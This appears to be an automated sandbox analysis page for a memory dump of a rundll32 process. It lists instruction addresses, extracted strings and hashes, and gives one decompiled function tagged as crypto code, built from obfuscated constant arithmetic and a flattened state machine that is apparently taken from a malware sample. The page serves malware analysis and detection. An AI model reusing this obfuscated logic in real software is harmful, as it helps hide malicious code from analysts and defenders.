0x00352fcd
0x00352fd8
0x00352fe3
0x00352fee
0x00352ff9
0x00353001
0x00353009
0x00353011
0x0035301c
0x00353027
0x00353032
0x0035303d
0x0035304f
0x00353054
0x0035305d
0x00353068
0x00353070
0x00353078
0x00353080
0x00353088
0x00353090
0x00353098
0x003530a1
0x003530a4
0x003530a8
0x003530b0
0x003530b8
0x003530c3
0x003530ce
0x003530d9
0x003530e4
0x003530ef
0x003530fa
0x00353102
0x0035310a
0x00353115
0x00353120
0x0035312b
0x00353136
0x00353141
0x0035314c
0x00353157
0x00353162
0x0035316d
0x00353178
0x00353185
0x0035318d
0x00353198
0x003531a0
0x003531a5
0x003531aa
0x003531af
0x003531b7
0x003531c7
0x003531cb
0x003531d0
0x003531d5
0x003531dd
0x003531e8
0x003531f3
0x003531fb
0x00353206
0x00353211
0x0035321c
0x00353227
0x0035323c
0x0035323f
0x00353251
0x00353258
0x00353263
0x0035326e
0x00353276
0x00353281
0x00353289
0x00353291
0x00353296
0x0035329e
0x003532a6
0x003532b1
0x003532b9
0x003532c4
0x003532cf
0x003532d7
0x003532df
0x003532e7
0x003532eb
0x003532f3
0x00353306
0x0035330d
0x00353318
0x00353323
0x0035332e
0x00353339
0x00353344
0x0035335a
0x00353369
0x0035336a
0x00353371
0x00353379
0x00353384
0x0035338f
0x003533a0
0x003533a7
0x003533b2
0x003533bd
0x003533c8
0x003533d3
0x003533db
0x003533e6
0x003533fc
0x00353401
0x00353412
0x00353415
0x0035341c
0x00353427
0x00353432
0x0035343a
0x00353445
0x00353450
0x0035345b
0x00353466
0x00353471
0x00353479
0x00353484
0x0035348f
0x003534a2
0x003534a9
0x003534b4
0x003534bf
0x003534ca
0x003534d5
0x003534dd
0x003534e5
0x003534ed
0x003534f8
0x00353503
0x0035350e
0x00353519
0x0035352f
0x00353536
0x00353541
0x0035354c
0x0035355b
0x00353560
0x00353569
0x00353574
0x0035357f
0x00353591
0x00353596
0x0035359f
0x003535b1
0x003535b4
0x003535bb
0x003535c6
0x003535d1
0x003535dc
0x003535e7
0x003535ef
0x003535fa
0x00353605
0x00353615
0x0035361c
0x00353627
0x00353632
0x0035363d
0x00353648
0x00353653
0x0035365d
0x00353669
0x0035366c
0x00353673
0x00353677
0x0035367f
0x00353687
0x0035368f
0x0035369c
0x003536a3
0x003536a7
0x003536b4
0x003536b8
0x003536c0
0x003536cb
0x003536d3
0x003536de
0x003536e9
0x003536f1
0x003536fc
0x0035370f
0x00353710
0x00353717
0x00353722
0x0035372a
0x00353732
0x0035373a
0x00353742
0x0035374a
0x00353752
0x00353760
0x00353769
0x0035376d
0x0035376d
0x00353775
0x00353775
0x00353775
0x00353775
0x0035377b
0x00000000
0x00000000
0x00353781
0x00353c04
0x00353c09
0x00000000
0x00353c09
0x00353787
0x0035378d
0x00353a80
0x00353a86
0x00353b54
0x00353b5a
0x00353bde
0x00353be3
0x00353be5
0x00353bf6
0x00353bf6
0x00353a28
0x00353a28
0x00000000
0x00353a28
0x00353b5c
0x00353b62
0x00353baf
0x00353bbb
0x00353bc4
0x00353bcc
0x00000000
0x00353bcc
0x00353b64
0x00353b6a
0x00353ba1
0x00000000
0x00353ba1
0x00353b6c
0x00353b6e
0x00000000
0x00000000
0x00353b90
0x00353b97
0x00000000
0x00353b97
0x00353a8c
0x00353b3d
0x00353b42
0x00353b44
0x00354009
0x00354010
0x00354010
0x00353b4a
0x00000000
0x00353b4a
0x00353a92
0x00353a98
0x00353b0f
0x00353b21
0x00353b27
0x00353b28
0x00353b2f
0x00000000
0x00353b2f
0x00353a9a
0x00353aa0
0x00353ae5
0x00353aec
0x00353af1
0x00000000
0x00353af1
0x00353aa2
0x00353aa8
0x00353ad6
0x00353adb
0x00000000
0x00353adb
0x00353aaa
0x00353ab0
0x00000000
0x00000000
0x00353ab6
0x00353abd
0x00353abf
0x00000000
0x00353abf
0x00353793
0x00353a70
0x00353a75
0x00353a76
0x00000000
0x00353a76
0x00353799
0x0035379f
0x003538e1
0x003538e7
0x003539f9
0x00353a00
0x00353a02
0x00353a32
0x00353a39
0x00353a3c
0x00353a48
0x00353a4a
0x00353a51
0x00353a51
0x00000000
0x00353a51
0x00353a4c
0x00353a4f
0x00000000
0x00000000
0x00000000
0x00353a4f
0x00353a3e
0x00000000
0x00353a3e
0x00353a1d
0x00353a23
0x00353a24
0x00353a26
0x00000000
0x00353a26
0x003538ed
0x003538f3
0x00353fd7
0x00000000
0x00353fdc
0x003538f9
0x003538ff
0x00353959
0x00353965
0x0035398e
0x00353995
0x0035399a
0x003539b7
0x003539bd
0x003539d5
0x00000000
0x003539da
0x00353901
0x00353907
0x00000000
0x00000000
0x00353914
0x00353919
0x00000000
0x00353919
0x003537a5
0x00353895
0x0035389a
0x0035389c
0x003538c5
0x003538ce
0x003538d6
0x0035389e
0x003538a2
0x003538ab
0x003538b3
0x003538b3
0x00000000
0x0035389c
0x003537b1
0x00353881
0x00353887
0x00000000
0x00353887
0x003537bd
0x00353850
0x00353855
0x0035385c
0x00353864
0x00000000
0x00353864
0x003537c5
0x003537f6
0x003537fb
0x00353802
0x00000000
0x00353802
0x003537cd
0x00000000
0x00000000
0x003537de
0x003537e5
0x00000000
0x003537eb
0x003537eb
0x00000000
0x003537eb
0x003537e5
0x00353c13
0x00353c19
0x00353e40
0x00353e46
0x00353edd
0x00353ee3
0x00353f9b
0x00353fa0
0x00353fa2
0x00353e13
0x00353e13
0x00000000
0x00353e13
0x00353fa8
0x00000000
0x00353fa8
0x00353ee9
0x00353eef
0x00353f21
0x00353f28
0x00353f89
0x00353f89
0x00000000
0x00353f89
0x00353f38
0x00353f54
0x00353f5b
0x00353f60
0x00353f63
0x00353f6a
0x00353f84
0x00000000
0x00353f84
0x00353f6c
0x00000000
0x00353f6c
0x00353ef1
0x00353ef7
0x00000000
0x00000000
0x00353f0b
0x00353f10
0x00353f17
0x00000000
0x00353f17
0x00353e4c
0x00353ec6
0x00353ecb
0x00353ecd
0x00000000
0x00000000
0x00353ed3
0x00000000
0x00353ed3
0x00353e4e
0x00353e54
0x00353ea9
0x00353eae
0x00000000
0x00353eae
0x00353e56
0x00353e5c
0x00354004
0x00000000
0x00354004
0x00353e62
0x00353e68
0x00353e93
0x00353e98
0x00000000
0x00353e98
0x00353e6a
0x00353e70
0x00000000
0x00000000
0x00353e7d
0x00353e82
0x00000000
0x00353e82
0x00353c1f
0x00353e24
0x00353e2d
0x00353e35
0x00000000
0x00353e35
0x00353c25
0x00353c2b
0x00353d2d
0x00353d33
0x00353e0e
0x00000000
0x00353e0e
0x00353d39
0x00353d3f
0x00353fef
0x00000000
0x00353fef
0x00353d45
0x00353d4b
0x00353d8c
0x00353d91
0x00353d92
0x00353d94
0x00353d9c
0x00353da3
0x00353da5
0x00353dc3
0x00353dc5
0x00353dcc
0x00353dcc
0x00353dcd
0x00353dd0
0x00353deb
0x00353df1
0x00353df2
0x00353df2
0x00353d96
0x00353d96
0x00353d96
0x00353df4
0x00353df6
0x00000000
0x00353df6
0x00353d4d
0x00353d53
0x00000000
0x00000000
0x00353d60
0x00353d65
0x00353d6c
0x00000000
0x00353d6c
0x00353c31
0x00353d16
0x00353d1b
0x00353d1d
0x00000000
0x00000000
0x00353d23
0x00000000
0x00353d23
0x00353c37
0x00353c3d
0x00353ce0
0x00353cef
0x00353cf4
0x00353cfb
0x00353d03
0x00000000
0x00353d03
0x00353c43
0x00353c49
0x00353c9e
0x00353caa
0x00353cbe
0x00353cc4
0x00000000
0x00353cc4
0x00353c4b
0x00353c51
0x00353c81
0x00353c86
0x00000000
0x00353c86
0x00353c53
0x00353c59
0x00000000
0x00000000
0x00353c63
0x00353c68
0x00353c6a
0x00000000
0x00000000
0x00353c70
0x00000000
0x00353fad
0x00353fad
0x00353fad
0x00000000

Strings

Y2(, xrefs: 003537B7
`, xrefs: 00353080
)If, xrefs: 00352F17
{)t, xrefs: 00353D4D
D}, xrefs: 00353C13
rZM*, xrefs: 003529BA
{)t, xrefs: 00353B2F
u#, xrefs: 003533A7
TRr, xrefs: 00352DC8
n)+, xrefs: 0035365D
\Q, xrefs: 0035269F
D}, xrefs: 003537EB
xy, xrefs: 00352886
orh, xrefs: 00352E30
G, xrefs: 003530A8
c{v, xrefs: 003526DA

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
API String ID: 0-2742041174
Opcode ID: 5e4561e7eb22e9ce388d7403e4f32bfa2365417eec154ecec65f5755d839b4f4
Instruction ID: d5f5d4bdbb1c4eca9db023c039e47ed30a38c35add39c0e67689f3c33764e8ef
Opcode Fuzzy Hash: 5e4561e7eb22e9ce388d7403e4f32bfa2365417eec154ecec65f5755d839b4f4
Instruction Fuzzy Hash: FEC214719083808BD379DF25C58ABCFBBE1BB85354F11891DE9D99A260DBB09948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0035AE6D Relevance: 19.3, Strings: 15, Instructions: 522
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0035AE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t537;
				void* _t566;
				void* _t567;
				intOrPtr _t573;
				void* _t575;
				void* _t577;
				void* _t585;
				void* _t588;
				void* _t594;
				void* _t596;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				void* _t611;
				void* _t633;
				void* _t660;
				void* _t675;
				intOrPtr _t677;
				intOrPtr _t680;
				signed int* _t682;
				void* _t685;

				_push(_a20);
				_t677 = __edx;
				_push(_a16);
				_v24 = __edx;
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t537);
				_v8 = 0x673696;
				_t680 = 0;
				_v4 = 0;
				_t682 =  &(( &_v272)[7]);
				_v144 = 0xf00d33;
				_v144 = _v144 | 0x228e8b2e;
				_t596 = 0x1d3710;
				_v144 = _v144 >> 8;
				_v144 = _v144 ^ 0x0022fe8f;
				_v244 = 0xde08aa;
				_t603 = 0x17;
				_v244 = _v244 / _t603;
				_v244 = _v244 + 0xffff54ea;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0x23f0fc00;
				_v224 = 0x36cb35;
				_v224 = _v224 | 0xc39aec51;
				_v224 = _v224 + 0x9146;
				_t604 = 0x62;
				_v224 = _v224 * 0x70;
				_v224 = _v224 ^ 0xa3c851d0;
				_v116 = 0xf2e64b;
				_v116 = _v116 << 5;
				_v116 = _v116 ^ 0x1e5cc960;
				_v248 = 0x2b7d5f;
				_t43 =  &_v248; // 0x2b7d5f
				_v248 =  *_t43 * 0x53;
				_v248 = _v248 + 0x8561;
				_v248 = _v248 | 0xae4dc352;
				_v248 = _v248 ^ 0xae5feb7e;
				_v80 = 0xe6036b;
				_v80 = _v80 * 0xb;
				_v80 = _v80 ^ 0x09e22599;
				_v240 = 0x5b8b4f;
				_v240 = _v240 + 0xffffe1e0;
				_v240 = _v240 ^ 0xb7b7812a;
				_v240 = _v240 + 0xffff41e0;
				_v240 = _v240 ^ 0xb7ec2de5;
				_v232 = 0xf81ab6;
				_v232 = _v232 ^ 0xa56b9217;
				_v232 = _v232 | 0x431a55e8;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xcdeef480;
				_v184 = 0xddfe73;
				_v184 = _v184 * 0x26;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xf3c51200;
				_v120 = 0x644fb5;
				_v120 = _v120 >> 6;
				_v120 = _v120 / _t604;
				_v120 = _v120 ^ 0x00000418;
				_v60 = 0xc6ff9f;
				_v60 = _v60 ^ 0x0d96ce7d;
				_v60 = _v60 ^ 0x0d5031e2;
				_v204 = 0xeedb74;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 >> 0xa;
				_v204 = _v204 | 0xba569879;
				_v204 = _v204 ^ 0xba56987f;
				_v268 = 0x9a0618;
				_v268 = _v268 ^ 0x10270239;
				_v268 = _v268 ^ 0x733075d3;
				_t605 = 0x16;
				_v268 = _v268 / _t605;
				_v268 = _v268 ^ 0x04865c22;
				_v160 = 0x655fad;
				_v160 = _v160 >> 3;
				_v160 = _v160 >> 4;
				_v160 = _v160 ^ 0x0009a8dc;
				_v272 = 0x9202;
				_v272 = _v272 | 0xfb135803;
				_t606 = 0x41;
				_v272 = _v272 * 0x2c;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x4ed07035;
				_v100 = 0x536289;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xa6cd28cf;
				_v108 = 0xf021d8;
				_v108 = _v108 ^ 0x8f8b6ed2;
				_v108 = _v108 ^ 0x8f701d8c;
				_v152 = 0xcba027;
				_v152 = _v152 ^ 0xce0cd109;
				_v152 = _v152 | 0x7dfb06f6;
				_v152 = _v152 ^ 0xfff88f5e;
				_v252 = 0xf09c41;
				_v252 = _v252 + 0x8e2a;
				_v252 = _v252 << 3;
				_v252 = _v252 | 0xdb831f2c;
				_v252 = _v252 ^ 0xdf846234;
				_v260 = 0x3d692f;
				_v260 = _v260 << 2;
				_v260 = _v260 | 0xbfb4a027;
				_v260 = _v260 + 0x643;
				_v260 = _v260 ^ 0xbffb0fde;
				_v92 = 0x80bca7;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 ^ 0x00038c1c;
				_v228 = 0xbbbc43;
				_v228 = _v228 | 0x61282476;
				_v228 = _v228 + 0xffff6ee2;
				_v228 = _v228 * 0x69;
				_v228 = _v228 ^ 0x15ccd750;
				_v236 = 0xc2062f;
				_v236 = _v236 | 0xf7f3ef67;
				_v236 = _v236 * 0x5c;
				_v236 = _v236 ^ 0x1ba01eed;
				_v128 = 0xa773bc;
				_v128 = _v128 << 0x10;
				_v128 = _v128 | 0xe162daa5;
				_v128 = _v128 ^ 0xf3f36b57;
				_v136 = 0x3287f3;
				_v136 = _v136 / _t606;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000c37d1;
				_v104 = 0x8d5fef;
				_v104 = _v104 + 0xffff56ea;
				_v104 = _v104 ^ 0x008f942b;
				_v44 = 0xd6bac6;
				_v44 = _v44 * 0x7f;
				_v44 = _v44 ^ 0x6a80c639;
				_v148 = 0xa4165e;
				_v148 = _v148 * 0x13;
				_v148 = _v148 | 0x84e82f79;
				_v148 = _v148 ^ 0x8cef9599;
				_v96 = 0xfc4916;
				_v96 = _v96 + 0xffff0795;
				_v96 = _v96 ^ 0x00f5cebb;
				_v132 = 0xd5d7c2;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x0010cc3c;
				_v264 = 0xf6e8cb;
				_v264 = _v264 + 0x6576;
				_v264 = _v264 + 0x7b15;
				_v264 = _v264 + 0x6b9c;
				_v264 = _v264 ^ 0x00fe3ec7;
				_v208 = 0x3a8541;
				_v208 = _v208 | 0x57459f57;
				_v208 = _v208 ^ 0x66631a8c;
				_v208 = _v208 | 0x178bfabb;
				_v208 = _v208 ^ 0x379a2cb6;
				_v56 = 0x33c5e6;
				_v56 = _v56 + 0x441;
				_v56 = _v56 ^ 0x0035e6a0;
				_v172 = 0x2bd4df;
				_v172 = _v172 + 0xda1f;
				_v172 = _v172 + 0x8171;
				_v172 = _v172 ^ 0x002cd084;
				_v48 = 0x796d26;
				_v48 = _v48 + 0xffff3152;
				_v48 = _v48 ^ 0x00766b67;
				_v88 = 0xfc738c;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x1ce8da45;
				_v140 = 0x79fdd0;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 * 0x78;
				_v140 = _v140 ^ 0x000f2c53;
				_v64 = 0xd0b1f6;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x000411a2;
				_v200 = 0xaa2240;
				_v200 = _v200 | 0x35f3f2d4;
				_v200 = _v200 + 0x4147;
				_v200 = _v200 + 0xffff1702;
				_v200 = _v200 ^ 0x35f16a60;
				_v52 = 0x980f89;
				_v52 = _v52 ^ 0xc15a5b47;
				_v52 = _v52 ^ 0xc1c323e9;
				_v216 = 0xb7a8b5;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0xa2f7ad91;
				_v216 = _v216 + 0xfffff0a8;
				_v216 = _v216 ^ 0xa2ec62b8;
				_v72 = 0x73581d;
				_v72 = _v72 + 0xffffc838;
				_v72 = _v72 ^ 0x00777119;
				_v164 = 0x873053;
				_v164 = _v164 ^ 0xefe323e3;
				_v164 = _v164 | 0xd91bba05;
				_v164 = _v164 ^ 0xff705bac;
				_v40 = 0xf8d5df;
				_v40 = _v40 ^ 0x79f853d7;
				_v40 = _v40 ^ 0x79053437;
				_v192 = 0x180af0;
				_v192 = _v192 + 0xffff4c14;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0x2aad;
				_v192 = _v192 ^ 0x175759c3;
				_v256 = 0x23b549;
				_v256 = _v256 + 0x5eb6;
				_v256 = _v256 | 0xffb7bbff;
				_v256 = _v256 ^ 0xffb807e9;
				_v176 = 0xc1fdd5;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 | 0x5151af8d;
				_v176 = _v176 ^ 0x515c7a4b;
				_v112 = 0xec5780;
				_v112 = _v112 ^ 0x97b4c021;
				_v112 = _v112 ^ 0x9750bd7e;
				_v180 = 0x591b41;
				_v180 = _v180 + 0x207e;
				_v180 = _v180 + 0xffffc81d;
				_v180 = _v180 ^ 0x005ca8dc;
				_v68 = 0x76fd1d;
				_t675 = 0x5c52c4a;
				_v68 = _v68 | 0x9e2d4356;
				_v68 = _v68 ^ 0x9e728261;
				_v76 = 0xf22a3;
				_v76 = _v76 | 0x9c703035;
				_v76 = _v76 ^ 0x9c7b5f20;
				_v220 = 0x3decab;
				_v220 = _v220 << 8;
				_v220 = _v220 ^ 0x53082a5e;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x0004d715;
				_v84 = 0x6eb476;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xd68135de;
				_v124 = 0x458e11;
				_v124 = _v124 | 0x336f5b57;
				_t607 = 0x43;
				_v124 = _v124 / _t607;
				_v124 = _v124 ^ 0x00c97d17;
				_v156 = 0x7cba2c;
				_t608 = 0x4b;
				_v156 = _v156 / _t608;
				_v156 = _v156 | 0x0b494d21;
				_v156 = _v156 ^ 0x0b48f5d9;
				_v36 = 0x519404;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x5195ba3f;
				_v168 = 0xf13e55;
				_v168 = _v168 | 0x95edbe5f;
				_v168 = _v168 ^ 0xd6548190;
				_v168 = _v168 ^ 0x43a3dbfd;
				_v188 = 0xdd4a71;
				_v188 = _v188 + 0xffff5bb0;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 >> 6;
				_v188 = _v188 ^ 0x000a03ec;
				_v196 = 0x58b29f;
				_t609 = 0x22;
				_v196 = _v196 / _t609;
				_v196 = _v196 + 0xffff713e;
				_v196 = _v196 + 0xffff146a;
				_v196 = _v196 ^ 0x000c9f67;
				_v212 = 0xc056c;
				_t610 = 0x45;
				_v212 = _v212 * 0x51;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 / _t610;
				_v212 = _v212 ^ 0x0007774b;
				while(1) {
					L1:
					_t566 = 0x6c6f684;
					while(1) {
						L2:
						_t611 = 0x92c3a26;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t685 = _t596 - _t675;
									if(_t685 > 0) {
										break;
									}
									if(_t685 == 0) {
										E00356BC6(_v124, _v32, _v156);
										_t596 = 0x4bc1ff4;
										goto L1;
									} else {
										if(_t596 == 0x1d3710) {
											_t596 = 0x6d0da1a;
											continue;
										} else {
											if(_t596 == 0x19992af) {
												_push(_t611);
												_push(_t611);
												_t573 = E00347FF2(_v16);
												__eflags = _t573;
												_v20 = _t573;
												_t660 = 0x19c2787;
												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
												_t566 = 0x6c6f684;
												_t611 = 0x92c3a26;
												continue;
											} else {
												if(_t596 == _t660) {
													_t575 = E00357B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
													_t682 =  &(_t682[0xc]);
													__eflags = _t575 - _v240;
													_t611 = 0x92c3a26;
													_t566 = 0x6c6f684;
													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
													goto L3;
												} else {
													if(_t596 == 0x489cb15) {
														_push(_v148);
														_push(_v44);
														_t577 = E0035DCF7(_v104, 0x3418b4, __eflags);
														_pop(_t633);
														__eflags = E00360B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
														E0034A8B0(_v48, _t577, _v88);
														_t677 = _v24;
														_t682 =  &(_t682[0xb]);
														L24:
														_t566 = 0x6c6f684;
														_t611 = 0x92c3a26;
														_t660 = 0x19c2787;
														goto L25;
													} else {
														if(_t596 != 0x4bc1ff4) {
															goto L25;
														} else {
															E00358519(_v36, _v168, _v20);
															_t596 = 0x87f6c1b;
															while(1) {
																L1:
																_t566 = 0x6c6f684;
																L2:
																_t611 = 0x92c3a26;
																L3:
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L28:
									return _t680;
								}
								__eflags = _t596 - _t566;
								if(_t596 == _t566) {
									_t567 = E0035828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
									_t682 =  &(_t682[6]);
									_t596 = _t675;
									__eflags = _t567 - _v60;
									_t680 =  ==  ? 1 : _t680;
									goto L24;
								} else {
									__eflags = _t596 - 0x6d0da1a;
									if(__eflags == 0) {
										_push(_v272);
										_push(_v160);
										_t585 = E0035DCF7(_v268, 0x341884, __eflags);
										_push(_v152);
										_push(_v108);
										_t588 = E00349462(_t585, _v260,  &_v28, E0035DCF7(_v100, 0x341814, __eflags), _v92, _v144);
										_t682 =  &(_t682[9]);
										__eflags = _t588 - _v244;
										_t596 =  ==  ? 0x489cb15 : 0x822e036;
										E0034A8B0(_v228, _t585, _v236);
										E0034A8B0(_v128, _t586, _v136);
										_t677 = _v24;
										_t675 = 0x5c52c4a;
										goto L24;
									} else {
										__eflags = _t596 - 0x87f6c1b;
										if(_t596 == 0x87f6c1b) {
											E0034957D(_v28, _v188, _v196, _v204, _v212);
										} else {
											__eflags = _t596 - _t611;
											if(_t596 != _t611) {
												goto L25;
											} else {
												_t594 = E0034A81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
												_t682 =  &(_t682[5]);
												__eflags = _t594 - _v184;
												_t566 = 0x6c6f684;
												_t596 =  ==  ? 0x6c6f684 : _t675;
												goto L2;
											}
										}
									}
								}
								goto L28;
								L25:
								__eflags = _t596 - 0x822e036;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

0x0035ae77
0x0035ae7e
0x0035ae80
0x0035ae87
0x0035ae8e
0x0035ae90
0x0035ae97
0x0035ae9e
0x0035ae9f
0x0035aea0
0x0035aea5
0x0035aeb0
0x0035aeb2
0x0035aeb9
0x0035aebc
0x0035aec9
0x0035aed4
0x0035aed9
0x0035aee1
0x0035aeec
0x0035aefa
0x0035aeff
0x0035af05
0x0035af0d
0x0035af12
0x0035af1a
0x0035af22
0x0035af2a
0x0035af37
0x0035af38
0x0035af3c
0x0035af44
0x0035af4f
0x0035af57
0x0035af62
0x0035af6a
0x0035af6f
0x0035af73
0x0035af7b
0x0035af83
0x0035af8b
0x0035af9e
0x0035afa5
0x0035afb0
0x0035afb8
0x0035afc0
0x0035afc8
0x0035afd0
0x0035afd8
0x0035afe0
0x0035afe8
0x0035aff0
0x0035aff5
0x0035affd
0x0035b00a
0x0035b00e
0x0035b013
0x0035b01b
0x0035b026
0x0035b037
0x0035b03e
0x0035b049
0x0035b054
0x0035b05f
0x0035b06a
0x0035b072
0x0035b077
0x0035b07e
0x0035b086
0x0035b08e
0x0035b096
0x0035b09e
0x0035b0ac
0x0035b0b1
0x0035b0b7
0x0035b0bf
0x0035b0ca
0x0035b0d2
0x0035b0da
0x0035b0e5
0x0035b0ed
0x0035b0fa
0x0035b0fb
0x0035b0ff
0x0035b103
0x0035b10b
0x0035b116
0x0035b11e
0x0035b129
0x0035b134
0x0035b13f
0x0035b14a
0x0035b155
0x0035b160
0x0035b16b
0x0035b176
0x0035b17e
0x0035b186
0x0035b18b
0x0035b193
0x0035b19b
0x0035b1a3
0x0035b1a8
0x0035b1b0
0x0035b1b8
0x0035b1c0
0x0035b1cb
0x0035b1d3
0x0035b1de
0x0035b1e6
0x0035b1ee
0x0035b1fb
0x0035b1ff
0x0035b207
0x0035b20f
0x0035b21c
0x0035b220
0x0035b228
0x0035b233
0x0035b23b
0x0035b246
0x0035b251
0x0035b265
0x0035b26c
0x0035b274
0x0035b27f
0x0035b28a
0x0035b295
0x0035b2a0
0x0035b2b3
0x0035b2ba
0x0035b2c5
0x0035b2d8
0x0035b2df
0x0035b2ea
0x0035b2f5
0x0035b300
0x0035b30b
0x0035b316
0x0035b321
0x0035b329
0x0035b331
0x0035b33c
0x0035b344
0x0035b34c
0x0035b354
0x0035b35c
0x0035b364
0x0035b36c
0x0035b374
0x0035b37c
0x0035b384
0x0035b38c
0x0035b397
0x0035b3a2
0x0035b3ad
0x0035b3b5
0x0035b3bd
0x0035b3c5
0x0035b3cd
0x0035b3d8
0x0035b3e3
0x0035b3ee
0x0035b3f9
0x0035b401
0x0035b40c
0x0035b417
0x0035b427
0x0035b42e
0x0035b439
0x0035b444
0x0035b44c
0x0035b457
0x0035b45f
0x0035b467
0x0035b46f
0x0035b477
0x0035b47f
0x0035b48a
0x0035b495
0x0035b4a0
0x0035b4a8
0x0035b4ad
0x0035b4b5
0x0035b4bd
0x0035b4c5
0x0035b4d0
0x0035b4db
0x0035b4e6
0x0035b4ee
0x0035b4f6
0x0035b4fe
0x0035b506
0x0035b511
0x0035b51c
0x0035b527
0x0035b52f
0x0035b537
0x0035b53c
0x0035b544
0x0035b54c
0x0035b554
0x0035b55c
0x0035b564
0x0035b56c
0x0035b574
0x0035b579
0x0035b581
0x0035b589
0x0035b594
0x0035b59f
0x0035b5aa
0x0035b5b2
0x0035b5ba
0x0035b5c2
0x0035b5cc
0x0035b5d7
0x0035b5dc
0x0035b5e7
0x0035b5f2
0x0035b5fd
0x0035b608
0x0035b613
0x0035b61b
0x0035b620
0x0035b628
0x0035b62d
0x0035b635
0x0035b640
0x0035b648
0x0035b653
0x0035b65e
0x0035b672
0x0035b677
0x0035b680
0x0035b68b
0x0035b69d
0x0035b6a2
0x0035b6ab
0x0035b6b6
0x0035b6c1
0x0035b6cc
0x0035b6d4
0x0035b6df
0x0035b6e7
0x0035b6ef
0x0035b6f7
0x0035b6ff
0x0035b707
0x0035b70f
0x0035b714
0x0035b719
0x0035b721
0x0035b72d
0x0035b732
0x0035b738
0x0035b740
0x0035b748
0x0035b750
0x0035b75d
0x0035b75e
0x0035b762
0x0035b76d
0x0035b771
0x0035b779
0x0035b779
0x0035b779
0x0035b77e
0x0035b77e
0x0035b77e
0x0035b783
0x0035b783
0x0035b788
0x0035b788
0x0035b788
0x0035b788
0x0035b78a
0x00000000
0x00000000
0x0035b790
0x0035b969
0x0035b96f
0x00000000
0x0035b796
0x0035b79c
0x0035b94a
0x00000000
0x0035b7a2
0x0035b7a8
0x0035b91c
0x0035b91d
0x0035b91e
0x0035b924
0x0035b926
0x0035b933
0x0035b938
0x0035b93b
0x0035b940
0x00000000
0x0035b7ae
0x0035b7b0
0x0035b8dc
0x0035b8e3
0x0035b8ef
0x0035b8f1
0x0035b8f6
0x0035b8fb
0x00000000
0x0035b7b6
0x0035b7bc
0x0035b7e9
0x0035b7f5
0x0035b803
0x0035b809
0x0035b866
0x0035b874
0x0035b877
0x0035b87c
0x0035b883
0x0035bada
0x0035bada
0x0035badf
0x0035bae4
0x00000000
0x0035b7be
0x0035b7c4
0x00000000
0x0035b7ca
0x0035b7dc
0x0035b7e2
